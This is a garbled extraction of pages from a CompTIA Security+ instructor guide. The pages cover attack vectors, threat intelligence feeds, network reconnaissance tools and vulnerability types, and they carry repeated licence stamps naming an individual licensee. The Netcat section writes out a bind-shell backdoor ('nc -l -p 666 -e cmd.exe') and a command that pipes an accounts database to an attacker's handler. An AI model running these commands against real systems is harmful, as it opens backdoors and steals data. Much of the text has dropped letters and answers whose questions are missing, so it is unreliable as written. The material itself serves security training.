engineering techni ues to persuade or trick the user into opening the attachment.
• emote and wireless the attacker either obtains credentials for a remote access
or wireless connection to the network or cracks the security protocols used for
authentication. Alternatively, the attacker spoofs a trusted resource, such as an
access point, and uses it to perform credential harvesting and then uses the stolen
account details to access the network.
• Supply chain rather than attack the target directly, a threat actor may seek
ways to infiltrate it via companies in its supply chain. ne high profile e ample of
this is the Target data breach, which was made via the company's AC supplier
krebsonsecurity.com target hackers broke in via hvac company .
• Cloud many companies now run part or all of their network services via Internet
accessible clouds. The attacker only needs to find one account, service, or host with
weak credentials to gain access. The attacker is likely to target the accounts used to
develop services in the cloud or manage cloud systems. They may also try to attack
the cloud service provider C as a way of accessing the victim system.
ophisticated threat actors will make use of multiple vectors. They are likely to plan a
multi stage campaign, rather than a single smash and grab type of raid.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
24 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Threat Actor Types and Attack Vectors
Answer the following uestions
isk. To assess likelihood and impact, you must identify both the vulnerability and the
threat posed by a potential e ploit.
2. True or false? Nation state actors primarily only pose a risk to other states.
alse nation state actors have targeted commercial interests for theft, espionage, and
e tortion.
This is either gray hat semi authori ed hacking or black hat non authori ed hacking.
If the re uest for compensation via consultancy is an e tortion threat if refused, the
hacker sells the e ploit on the dark web , then the motivation is purely financial gain
and can be categori ed as black hat. If the consultancy is refused and the hacker takes
no further action, it can be classed as gray hat.
acktivist.
5. Which three types of threat actor are most likely to have high levels
o undin
6. You are assisting with writing an attack surface assessment report for a
small company. Following the CompTIA syllabus, which two potential attack
vectors have been omitted from the following headings in the report? Direct
access, Email, Remote and wireless, Web and social media, Cloud.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 25
Topic 2B
Explain Threat Intelligence Sources
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
26 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Using the TO browser to view the Alpha ay market, now closed by law enforcement.
(Screenshot used with permission from Security Onion.)
Investigating these dark web sites and message boards is a valuable source of
counterintelligence. The anonymity of dark web services has made it easy for
investigators to infiltrate the forums and webstores that have been set up to e change
stolen data and hacking tools. As adversaries react to this, they are setting up new
networks and ways of identifying law enforcement infiltration. Conse uently, dark nets
and the dark web represent a continually shifting landscape.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 27
subscribers in the form of blogs, white papers, and webinars. ome e amples of
such platforms include
• endor websites proprietary threat intelligence is not always provided at cost. All
types of security, hardware, and software vendors make huge amounts of threat
research available via their websites as a general benefit to their customers. ne
e ample is Microsoft's ecurity Intelligence blog microsoft.com security blog
microsoft security intelligence .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
28 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• irusTotal virustotal.com
As well as referring to open-source threat research providers, OSI T can mean any
intelligence derived from publicly available information. OSI T is a common reconnaissance
techni ue where the attacker harvests domains, IP address ranges, employees, and other
data that will assist in identifying attack vectors. Companies should also monitor public
networks for signs of attack planning (chatter on forums) and breaches (confidential
information or account credentials posted to online forums). ost commercial providers
offer monitoring services, which can include dark web sources (fireeye.com content dam
fireeye-www products pdfs pf intel ds-digital-threat-monitoring.pdf).
As well as a source of information, social media should also be monitored for threat data
(trendmicro.com vinfo us security news cybercrime-and-digital-threats hunting-threats-on-
twitter).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 29
TTPs describe what and how an adversary acts and Indicators describe how to recognize
what those actions might look like. sti pro ect.github.io documentation concepts
ttp vs indicator
As there are many di erent targets and vectors of an attack, so too are there many
di erent potential IoCs. The following is a list of some IoCs that you may encounter
• nauthori ed software and files
• uspicious emails
• ogue hardware
An IoC can be definite and ob ectively identifiable, like a malware signature, but often
IoCs can only be described with confidence via the correlation of many data points. Show Slide(s)
ecause these IoCs are often identified through patterns of anomalous activity rather
than single events, they can be open to interpretation and therefore slow to diagnose.
Threat Data eeds
Conse uently, threat intelligence platforms use AI backed analysis to speed up
detection without overwhelming analysts' time with false positives.
Teaching
Tip
Strictly speaking, an IoC is evidence of an attack that was successful. The term indicator of
Make sure students
attack (IoA) is sometimes also used for evidence of an intrusion attempt in progress.
can distinguish TI
and TA II.
Note that we'll
cover vulnerability
Threat Data Feeds assessment in the
ne t lesson.
hen you use a cyber threat intelligence CTI platform, you subscribe to a threat data
Interaction
feed. The information in the threat data can be combined with event data from your
Opportunity
own network and system logs. An analysis platform performs correlation to detect
whether any IoCs are present. There are various ways that a threat data feed can be ou can show some
other threat map
implemented.
e amples, such
as Check oint's
Structured Threat Information eXpression (STIX) threatmap.
checkpoint.com .
The A I CTI framework oasis open.github.io cti documentation is designed to aspersky's is visually
provide a format for this type of automated feed so that organi ations can share CTI. impressive too
The Structured Threat Information eXpression (STIX) part of the framework describes cybermap.kaspersky.
standard terminology for IoCs and ways of indicating relationships between them. com .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
30 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
STI elationship example. (Icon images Copyright 016 ret ordan. icensed under the Creative
Commons Attribution-ShareAlike (CC Y-SA) icense, ersion .0. (freetaxii.github.io stix -icons.html.)
here TI provides the synta for describing CTI, the Trusted Automated eXchange
of Indicator Information (TAXII) protocol provides a means for transmitting CTI data
between servers and clients. or e ample, a CTI service provider would maintain a
repository of CTI data. ubscribers to the service obtain updates to the data to load
into analysis tools over TA II. This data can be re uested by the client referred to as a
collection , or the data can be pushed to subscribers referred to as a channel .
Threat Maps
A threat map is an animated graphic showing the source, target, and type of attacks
that have been detected by a CTI platform. The security solutions providers publish
such maps showing global attacks on their customers' systems fortinet.com
fortiguard threat intelligence threat map .
File/Code Repositories
A file code repository such as virustotal.com holds signatures of known malware code.
The code samples derive from live customer systems and for public repositories files
that have been uploaded by subscribers.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 31
A threat data feed does not produce threat intelligence automatically. The combination Artificial Intelligence
of security intelligence and CTI data can be processed, correlated, and analy ed to and redictive Analysis
provide actionable insights that will assist you in identifying security problems. or
e ample, security intelligence reveals that DDo attacks were perpetrated against your Teaching
web services from a range of I addresses by collecting log and network traffic data. Tip
Threat intelligence associates those I addresses with a hacktivist group. y linking Note that security
the two sources of intelligence, you can identify goals and tactics associated with that tools are increasingly
group and use controls to mitigate further attacks. Most threat intelligence platforms making use of AI and
use some sort of artificial intelligence AI to perform correlation analysis. ML techni ues. e will
be referring to these
again when looking
AI and Machine Learning at I M and A
analytics and incident
AI is the science of creating machine systems that can simulate or demonstrate a response.
similar general intelligence capability to humans. arly types of AI e pert systems
use if then rules to draw inferences from a limited data set, called a knowledge base.
Machine learning (ML) uses algorithms to parse input data and then develop
strategies for using that data, such as identifying an ob ect as a type, working out the
best ne t move in a game, and so on. nlike an e pert system, machine learning can
modify the algorithms it uses to parse data and develop strategies. It can make gradual
improvements in the decision making processes. The structure that facilitate this
learning process is referred to as an artificial neural network ANN . Nodes in a neural
network take inputs and then derive outputs, using comple feedback loops between
nodes. An ML system has ob ectives and error states and it ad usts its neural network
to reduce errors and optimi e ob ectives.
In terms of threat intelligence, this AI backed analysis might perform accurate
correlations that would take tens or hundreds of hours of analyst time if the data were
to be e amined manually.
Predictive Analysis
Identifying the signs of a past attack or the presence of live attack tools on a network
uickly is valuable. owever, one of the goals of using AI backed threat intelligence is
to perform predictive analysis, or threat forecasting. This means that the system can
anticipate a particular type of attack and possibly the identity of the threat actor before
the attack is fully reali ed. or e ample, the system tags references to a company,
related I addresses, and account names across a range of ingested data from dark
web sources, web searches, social media posts, phishing email attempts, and so on.
The analysis engine associates this chatter with I addresses that it can correlate with
a known adversary group. This gives the target advance warning that an attack is in the
planning stages and more time to prepare an e ective defense.
uch concrete threat forecasting is not a proven capability of any commercial threat
intelligence platform at the time of writing. owever, predictive analysis can inform risk
assessment by giving more accurate, uantified measurements of the likelihood and
impact cost of breach type events.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
32 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Threat Intelligence Sources
Answer the following uestions
or critical infrastructure providers, threat data sharing via an Information haring and
Analysis Center I AC is likely to be the best option.
3. You are assessing whether to join AIS. What is AIS and what protocol should
your SIEM support in order to connect to AIS servers?
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 33
Lesson 2
Summary
ou should be able to e plain how to assess e ternal and insider threat actor types Teaching
in terms of intent and capability. ou should also be able to summari e options for Tip
implementing threat intelligence platforms and data sources. Check that students
are confident about
the content that has
Guidelines for Explaining Threat Actors and been covered. If there
Threat Intelli ence is time, re visit any
content e amples that
ollow these guidelines when you assess the use of threat research and analysis they have uestions
about. If you have
• Create a profile of threat actor types that pose the most likely threats to your used all the available
business. emember that you may be targeted as the supplier to a larger enterprise. time for this lesson
block, note the issues,
• Identify sources of threat research, especially those that are directly relevant to your and schedule time for
industry sector. chedule time to keep up to date with threat trends and security a review later in the
course.
best practices.
Interaction
• valuate the use of a threat intelligence platform, considering proprietary versus
Opportunity
open source options.
ptionally, discuss
• valuate the use of di erent proprietary and open source threat data feeds, with students how
considering that sector specific data might be of most use. threat intelligence
platforms and data
feeds could be used
within their own
workplaces, or how
these resources
have already been
implemented, and
how successful they
have proved.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 3
Performing Security Assessments
Lesson Objectives
In this lesson, you will:
• Assess organizational security with network reconnaissance tools.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
36 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 3A
Assess Organizational Security with
Network Reconnaissance Tools
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 37
Performing a ping sweep in indows with a or loop Searching multiple octets re uires nested loops.
ote that not all hosts respond to IC P probes. (Screenshot used with permission from icrosoft.)
or more information about commands, including syntax usage, look up the command in
an online resource for indows (docs.microsoft.com en-us windows-server administration
windows-commands windows-commands) or inux (linux.die.net man).
The following tools can be used to test the routing configuration and connectivity with route and traceroute
remote hosts and networks.
• route view and configure the host's local routing table. Most end systems use a
default route to forward all traffic for remote networks via a gateway router. If the
host is not a router, additional entries in the routing table could be suspicious.
Output from the route command on a inux host. ost endpoints have a simple routing table, similar
to this. It shows the default route (0.0.0.0 0) via the host configured as the default gateway (10.1.0. )
over the network interface eth0. The second line of the table shows the subnet for local traffic
(10.1.0.0 ). This network is directly connected, represented by the 0.0.0.0 gateway.
• tracert—uses ICMP probes to report the round trip time (RTT) for hops between the
local host and a host on a remote network. tracert is the Windows version of
the tool.
• pathping—provides statistics for latency and packet loss along a route over a
longer measuring period. pathping is a Windows tool; the equivalent on Linux
is mtr.
In a security context, high latency at the default gateway compared to a baseline might
indicate a man-in-the-middle attack. High latency on other hops could be a sign of
denial or service, or could just indicate network congestion.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
38 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
In inux, commands such as ifconfig, arp, route, and traceroute are deprecated and
the utilities have not been updated for some years. The iproute suite of tools supply
replacements for these commands (digitalocean.com community tutorials how-to-use-
iproute -tools-to-manage-network-configuration-on-a-linux-vps).
map default scan listing open ports from within the default range. (Screenshot map nmap.org.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 39
aving identified active I hosts on the network and gained an idea of the network ervice Discovery and
topology, the next step in network reconnaissance is to work out which operating Nmap
systems are in use, which network services each host is running, and, if possible,
which application software is underpinning those services. This process is described as Teaching
ser ice disco er . ervice discovery can also be used defensively, to probe potential Tip
rogue systems and identify the presence of unauthorized network service ports. Remind students that
these techniques
er ice isco er ith map can be used
defensively (auditing)
When Nmap completes a host discovery scan, it will report on the state of each port or o ensively
scanned for each IP address in the scope. At this point, you can run additional service (reconnaissance).
discovery scans against one or more of the active IP addresses. Some of the principal
options for service discovery scans are:
• TCP SYN (-sS)—this is a fast technique also referred to as half-open scanning, as
the scanning host requests a connection without acknowledging it. The target's
response to the scan's N packet identifies the port state.
• UDP scans (-sU)—scan UDP ports. As these do not use ACKs, Nmap needs to wait
for a response or timeout to determine the port state, so UDP scanning can take a
long time. A UDP scan can be combined with a TCP scan.
• Port range (-p)—by default, Nmap scans 1000 commonly used ports, as listed in its
configuration file. se the -p argument to specify a port range.
• Application name and version—the software operating the port, such as Apache
web server or Internet Information Services (IIS) web server.
• Device type—not all network devices are PCs. Nmap can identify switches and
routers or other types of networked devices, such as NAS boxes, printers, and
webcams.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
40 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
netstat command running on indows showing activity during an nmap scan. The findstr function
is being used to filter the output (to show only connections from IPv hosts on the same subnet).
(Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 41
On Linux, use of netstat is deprecated in favor of the ss command from the iptools suite
(linux.com topic networking introduction-ss-command).
• nsloo up/di —query name records for a given domain using a particular DNS
resolver under Windows (nslookup) or Linux (dig). An attacker may test a
network to find out if the DN service is misconfigured. A misconfigured DN may
allow a zone transfer, which will give the attacker the complete records of every host
in the domain, revealing a huge amount about the way the network is configured.
Testing whether the name server for comptia.org will allow a zone transfer.
(Screenshot used with permission from icrosoft.)
There are hundreds of tools relevant to security assessments, network reconnaissance, Other Reconnaissance
vulnerability scanning, and penetration testing. Security distributions specialize in and Discovery Tools
bundling these tools for Linux—notably KALI (kali.org) plus ParrotOS (parrotlinux.org)—
and Windows (fireeye.com blog threat research commando vm windows Teaching
o ensive distribution.html). Tip
There is only space
the ar ester for brief overviews of
these tools, though
the ar ester is a tool for gathering open-source intelligence (OSINT) for a particular we will be examining
domain or company name (github.com/laramies/theHarvester). It works by scanning vulnerability scanners
multiple public data sources to gather emails, names, subdomains, IPs, URLs and other in more detail later in
the lesson.
relevant data.
dnsenum
While you can use tools such as dig and whois to query name records and hosting
details and to check that external DNS services are not leaking too much information,
a tool such as dnsenum packages a number of tests into a single query (github.com/
fwaeytens/dnsenum). As well as hosting information and name records, dnsenum can
try to work out the IP address ranges that are in use.
scanless
ort scannin is difficult to conceal from detection systems, unless it is performed
slowly and results gathered over an extended period. Another option is to disguise the
source of probes. To that end, scanless is a tool that uses third-party sites (github.com/
vesche/scanless). This sort of tool is also useful for in a defensive sense by scanning for
ports and services that are open, but shouldn't be.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
42 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
curl
curl is a command-line client for performing data transfers over many types of
protocol (curl.haxx.se). This tool can be used to submit HTTP GET, POST, and PUT
requests as part of web application vulnerability testing. curl supports many other
data transfer protocols, including FTP, IMAP, LDAP, POP3, SMB, and SMTP.
essus
The list of services and version information that a host is running can be cross-
checked against lists of known software vulnerabilities. This type of scanning is
usually performed using automated tools. essus, produced by Tenable Network
Security (tenable.com/products/nessus/nessus-professional), is one of the best-known
commercial vulnerability scanners. It is available in on-premises (Nessus Manager)
and cloud (Tenable Cloud) versions, as well as a Nessus Professional version, designed
for smaller networks. The product is free to use for home users but paid for on a
subscription basis for enterprises. As a previously open-source program, Nessus also
supplies the source code for many other scanners.
Teaching
• ac et anal sis refers to deep-down frame-by-frame scrutiny of captured frames.
Tip • rotocol anal sis means using statistical tools to analyze a sequence of packets, or
Make sure students packet trace.
understand what
information can be acket and protocol analysis depends on a sni er tool to capture and decode the
gathered depending frames of data. Network traffic can be captured from a host or from a network
on where the host/
sensor running the
segment. sing a host means that only traffic directed at that host is captured.
tool is placed in the Capturing from a network segment can be performed by a switched port analyzer
network. AN port or mirror port . This means that a network switch is configured to copy
Note that network frames passing over designated source ports to a destination port, which the packet
monitoring is both a sni er is connected to. niffing can also be performed over a network cable segment
threat (snooping) and by using a test access port (TAP). This means that a device is inserted in the cabling to
a security measure copy frames passing over it. There are passive and active (powered) versions.
(snooping on the
snoopers). Typically, sni ers are placed inside a firewall or close to a server of particular
importance. The idea is usually to identify malicious traffic that has managed to
get past the firewall. A single sni er can generate an e ceptionally large amount of
data, so you cannot just put multiple sensors everywhere in the network without
provisioning the resources to manage them properly. Depending on network size and
resources, one or just a few sensors will be deployed to monitor key assets or network
paths.
tcpdump is a command-line packet capture utility for Linux (linux.die.net/man/8/
tcpdump). The basic syntax of the command is tcpdump -i eth0, where
eth0 is the interface to listen on. The utility will then display captured packets until
halted manually (Ctrl+C . rames can be saved to a .pcap file using the -w option.
Alternatively, you can open a pcap file using the -r option.
tcpdump is often used with some sort of filter e pression to reduce the number of
frames that are captured:
• Type filter by host, net, port, or portrange.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 43
• rotocol filter by a named protocol rather than port number for e ample, arp,
icmp, ip, ip6, tcp, udp, and so on).
Filter expressions can be combined by using Boolean operators:
• and (&&)
• or (||)
• not (!)
Filter syntax can be made even more detailed by using parentheses to group
e pressions. A comple filter e pression should be enclosed by uotes. or e ample,
the following command filters frames to those with the source I . . . and
destination port 53 or 80:
tcpdump -i eth0 "src host 10.1.0.100 and (dst port
53 or dst port 80)"
A protocol analy er or packet analy er works in con unction with a sni er to perform Packet Analysis and
tra c anal sis. You can either analyze a live capture or open a saved capture (.pcap) Wireshark
file. rotocol analy ers can decode a captured frame to reveal its contents in a readable
format. You can choose to view a summary of the frame or choose a more detailed Teaching
view that provides information on the OSI layer, protocol, function, and data. Tip
Students should get as
ireshar (wireshark.org) is an open-source graphical packet capture and analysis much practice using
utility, with installer packages for most operating systems. Having chosen the interface Wireshark as possible.
to listen on, the output is displayed in a three-pane view. The packet list pane shows a
scrolling summary of frames. The packet details pane shows e pandable fields in the
frame currently selected from the packet list. The packet bytes pane shows the raw
data from the frame in hex and ASCII. Wireshark is capable of parsing (interpreting) the
headers and payloads of hundreds of network protocols.
ou can apply a capture filter using the same e pression synta as tcpdump (though
the expression can be built via the GUI tools too). You can save the output to a .pcap
file or load a file for analysis. ireshark supports very powerful display filters wiki.
wireshark.org/DisplayFilters that can be applied to a live capture or to a capture file.
You can also adjust the coloring rules (wiki.wireshark.org/ColoringRules), which control
the row shading and font color for each frame.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
44 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
The PCAP file format has some limitations, which has led to the development of PCAP ext
Generation (PCAP G). ireshark now uses PCAP G by default, and tcpdump can process
files in the new format too (cloudshark.io articles -reasons-to-move-to-pcapng).
hpin
hping is an open source spoofing tool that provides a penetration tester with the
ability to craft network packets to e ploit vulnerable firewalls and ID s. hping can
perform the following types of test:
• ost port detection and firewall testing like Nmap, hping can be used to probe
IP addresses and TCP/UDP ports for responses.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 45
tcprepla
As the name suggests, tcprepla takes previously captured traffic that has been saved
to a .pcap file and replays it though a network interface linux.die.net/man/1/tcpreplay).
ptionally, fields in the capture can be changed, such as substituting MAC or I
addresses. tcpreplay is useful for analysis purposes. If you have captured suspect
traffic, you can replay it through a monitored network interface to test intrusion
detection rules.
A remote access tro an AT is malware that gives an adversary the means of Exploitation
remotely accessing the network. From the perspective of security posture assessment, Frameworks
a penetration tester might want to try to establish this sort of connection and attempt
to send corporate information over the channel data e filtration . If security controls Teaching
are working properly, this attempt should be defeated or at least detected . Tip
An e ploitation rame or uses the vulnerabilities identified by an automated These are complex
products, so just focus
scanner and launches scripts or software to attempt to deliver matching exploits. This on the basic uses.
might involve considerable disruption to the target, including service failure, and risk
data security.
The framework comprises a database of exploit code, each targeting a particular
CVE (Common Vulnerabilities and Exposures). The exploit code can be coupled with
modular payloads. Depending on the access obtained via the exploit, the payload code
may be used to open a command shell, create a user, install software, and so on. The
custom exploit module can then be injected into the target system. The framework
may also be able to obfuscate the code so that it can be injected past an intrusion
detection system or anti-virus software.
The best-known exploit framework is etasploit (metasploit.com). The platform
is open-source software, now maintained by Rapid7. There is a free framework
(command-line) community edition with installation packages for Linux and Windows.
Rapid7 produces pro and express commercial editions of the framework and it can be
closely integrated with the Nexpose vulnerability scanner.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
46 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Zed Attack Proxy (ZAP)—scanning tools and scripts for web application and mobile
app security testing (owasp.org/www-project-zap).
ho lide s Netcat
Netcat
ne simple but e ective tool for testing connectivity is Netcat (nc), available for both
indows and Linu . Netcat can be used for port scanning and fingerprinting. or
Teaching example, the following command attempts to connect to the HTTP port on a server and
Tip return any banner by sending the "head" HTTP keyword:
Note that there are echo "head" | nc 10.1.0.1 -v 80
several versions of
Netcat, including Netcat can also establish connections with remote machines. To configure Netcat as a
OpenBSD Netcat and
backdoor, you first set up a listener on the victim system I . . . set to pipe traffic
Nmap's ncat (nmap.
org/ncat). from a program, such as the command interpreter, to its handler:
nc -l -p 666 -e cmd.exe
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 47
The following command connects to the listener and grants access to the terminal:
nc 10.1.0.1 666
sed the other way around, Netcat can be used to receive files. or e ample, on the
target system the attacker runs the following:
type accounts.sql | nc 10.1.0.192 6666
n the handler I . . . , the attacker receives the file using the following
command:
nc -l -p 6666 > accounts.sql
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
48 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Organizational Security with Network
Reconnaissance Tools
Answer the following questions:
se ipconfig to check the I addresses of the default gateway and the D C server. se
arp to check the MAC addresses associated with those IP addresses and investigate
possible spoofing. ou could also use the route command to verify the properties of
the default route.
From a Windows host, the pathping tool can be used to measure latency along a route.
3. hat t pe o tool could ou use to fin erprint the host actin as the de ault
ate a
This re uires a tool that performs fingerprinting service and version detection by
examining responses to network probes and comparing them to known responses
from common platforms. Nmap is very widely used for this task, or you could use
hping or Netcat.
4. ou are in esti atin a inu ser er that is the source o suspicious net or
tra c At a terminal on the ser er hich tool could ou use to chec hich
process is usin a i en TC port
5. hat is a one trans er and hich reconnaissance tools can e used to test
hether a ser er ill allo one
A zone transfer is where a domain name server (DNS) allows a client to request all the
name records for a domain. nslookup (Windows) and dig (principally Linux) can be used
to test whether this query is allowed. You could also mention the dnsenum tool, which
will check for zone transfers along with other enumeration tests on DNS infrastructure.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 49
The tcpreplay tool can be used to stream captured traffic from a file to a monitored
network interface.
Whether it is possible to open a network connection to a remote host over a given port.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
50 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 3B
Explain Security Concerns with General
Vulnerability Types
• irmware vulnerabilities can e ist in the I I firmware that controls the boot
process for Cs. There can also be bugs in device firmware, such as network cards
and disk controllers. Finally, network appliances and Internet of Things (IoT) devices
run code as a type of firmware. Like kernel vulnerabilities, firmware e ploits
can be difficult to identify, because the e ploit code can run with the highest
level of privilege. The Intel AMT vulnerability illustrates the impacts of a firmware
vulnerability (blackhat.com/docs/us-17/thursday/us-17-Evdokimov-Intel-AMT-
Stealth-Breakthrough-wp.pdf).
Most vulnerabilities are discovered by software and security researchers, who notify
the vendor to give them time to patch the vulnerability before releasing details
to the wider public. Improper or weak patch management is an additional layer
of vulnerability where these security patches are not applied to systems, leaving
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 51
them vulnerable to e ploits. oor configuration management may mean that the
organization is simply not documenting and managing its assets rigorously. Patches
may be deployed to some systems, but not others. Patches may be applied and then
removed because they cause performance issues.
ven if e ective patch management procedures are in place, attackers may still be Zero-Day and
able to use software vulnerabilities as an attack vector. A vulnerability that is exploited Legacy Platform
before the developer knows about it or can release a patch is called a ero da . These Vulnerabilities
can be extremely destructive, as it can take the vendor some time to develop a patch,
leaving systems vulnerable in the interim.
The term zero-day is usually applied to the vulnerability itself but can also refer to an attack
or malware that exploits it. The Eternal lue zero-day exploit makes for an instructive case
study (wired.com story eternalblue-leaked-nsa-spy-tool-hacked-world).
ero day vulnerabilities have significant financial value. A ero day e ploit for a mobile
OS can be worth millions of dollars. Consequently, an adversary will only use a zero-
day vulnerability for high value attacks. State security and law enforcement agencies
are known to stockpile zero-days to facilitate the investigation of crimes.
A legacy platform is one that is no longer supported with security patches by its
developer or vendor. This could be a PC/laptop/smartphone, networking appliance,
peripheral device, Internet of Things device, operating system, database/programming
environment, or software application. y definition, legacy platforms are unpatchable.
Such systems are highly likely to be vulnerable to exploits and must be protected
by security controls other than patching, such as isolating them to networks that an
attacker cannot physically connect to.
hile ine ective patch and configuration management policies and procedures Weak Host
represent one type of vulnerability, weak configurations can have similar impacts. Configurations
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
52 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
account is usually disabled for login. Even if this type of account is enabled for local
(interactive) login, it should not be accessible via remote login mechanisms.
pen ermissions
pen permissions refers to provisioning data files or applications without
di erentiating access rights for user groups. ermissions systems can be comple
and it is easy to make mistakes, such as permitting unauthenticated guests to view
confidential data files, or allowing write access when only read access is appropriate.
This issue is particularly prevalent on cloud storage, where administrators used to
Windows and Linux directory access control lists may be unfamiliar with the cloud
equivalents (directdefense.com/how-to-prevent-exploitation-of-amazon-s3-buckets-
with-weak-permissions).
• Disable services that are installed by default but that are not needed. Ideally, disable
the service on the server itself, but in some circumstances it may be necessary to
block the port using a firewall instead.
• For services that should only be available on the private network, block access to
ports at border firewalls or segment the network so that the servers cannot be
accessed from external networks.
nsecure rotocols
An unsecure protocol is one that transfers data as cleartext; that is, the protocol does
not use encryption for data protection. Lack of encryption also means that there is
no secure way to authenticate the endpoints. This allows an attacker to intercept and
modify communications, acting as man-in-the-middle (MITM).
ea ncr ption
Encryption algorithms protect data when it is stored on disk or transferred over
a network. Encrypted data should only be accessible to someone with the correct
decryption key. Weak encryption vulnerabilities allow unauthorized access to data.
Such vulnerabilities arise in the following circumstances:
• The key is generated from a simple password, making it vulnerable to guessing
attempts by brute-force enumeration (if the password is too short) or dictionary
enumeration (if the password is not complex).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 53
• The algorithm or cipher used for encryption has known weaknesses that allow
brute-force enumeration.
• The key is not distributed securely and can easily fall into the hands of people who
are not authorized to decrypt the data.
rrors
eakly configured applications may display unformatted error messages under
certain conditions. These error messages can be revealing to threat actors probing for
vulnerabilities and coding mistakes. Secure coding practices should ensure that if an
application fails, it does so "gracefully" without revealing information that could assist
the development of an exploit.
Vulnerabilities can lead to various data breach and data loss scenarios. These Impacts from
events can have serious impacts in terms of costs and damage to the organization's Vulnerabilities
reputation.
Teaching
ata reaches and ata filtration Impacts Tip
Ensure students can
All information should be collected, stored, and processed by authenticated users and distinguish breach,
hosts subject to the permissions (authorization) allocated to them by the data owner. e filtration, and loss
Data breach and data e filtration describe two types of event where unauthori ed and associate these
information use occurs: events with financial
and reputational
• A data breach event is where confidential data is read or transferred without impacts.
authorization. A privacy breach is where personal data is not collected, stored,
or processed in full compliance with the laws or regulations governing personal
information. A breach can also be described as a data leak. A data breach can be
intentional/malicious or unintentional/accidental.
• ata exfiltration is the methods and tools by which an attacker transfers data
without authorization from the victim's systems to an external network or media.
nlike a data breach, a data e filtration event is always intentional and malicious. A
data breach is a conse uence of a data e filtration event.
Data breach includes a wide range of scenarios with di erent levels of impact. The
most severe data breaches compromise valuable intellectual property (IP) or the
personal information of account holders.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
54 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 55
ata tora e
There are two main scenarios for risks to data when using third-parties. First, you may
need to grant vendor access to your data, and second, you may use a vendor to host
data or data backups and archives. The following general precautions should be taken:
• Ensure the same protections for data as though it were stored on-premises,
including authorization and access management and encryption.
• Monitor and audit third-party access to data storage to ensure it is being used only
